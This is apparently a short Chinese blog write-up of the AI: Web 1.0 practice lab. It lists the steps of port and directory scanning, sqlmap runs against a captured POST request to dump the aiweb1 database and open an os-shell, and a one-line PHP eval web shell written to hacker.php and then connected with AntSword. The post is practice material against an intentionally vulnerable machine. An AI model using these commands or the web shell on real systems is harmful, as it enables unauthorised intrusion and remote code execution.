AI WEB1.0 打靶

1.探测ip及端口

2.扫目录

3. 看看这几个目录有啥

4.看看这个爬虫文件里的 发现都被禁止

5. uploads没权限的话那试试se3reTdir777/   发现可以  然后试着submit一下

6.看到这我感觉像sql注入 拿sqlmap跑一下吧 先抓个包

7.post型的 把数据包放1.txt里 使用 python3 sqlmap.py -r 1.txt --current-db --batch

8.python3 sqlmap.py -r 1.txt -D aiweb1 --tables --batch

9.看看aiweb1pwn密码

然后算了 试试user

10.上面没啥成果 得提权

python3 sqlmap.py -r 1.txt --os-shell

然后看看这个info.php

echo "<php @eval(/$_POST['cmd']);?>" > hacker.php

出现这种情况就是好了

蚁剑连

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值